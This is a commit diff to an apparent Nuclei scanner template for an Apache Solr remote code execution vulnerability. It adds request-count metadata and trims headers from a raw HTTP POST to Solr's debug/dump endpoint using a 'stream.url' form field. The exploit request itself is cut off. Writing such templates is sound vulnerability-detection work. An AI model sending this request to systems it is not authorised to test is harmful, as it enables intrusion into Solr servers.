Update apache-solr-rce.yaml

patch-1
Ritik Chaddha 2023-08-02 13:45:54 +05:30 committed by GitHub
parent e2bc266ce2
commit 4470bfbb29
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -6,6 +6,8 @@ info:
severity: critical
reference:
- https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/
metadata:
max-request: 2
tags: solr,apache,rce,oast
http:
@ -20,9 +22,7 @@ http:
- |
POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9
Connection: close
--------------------------5897997e44b07bf9
Content-Disposition: form-data; name="stream.url"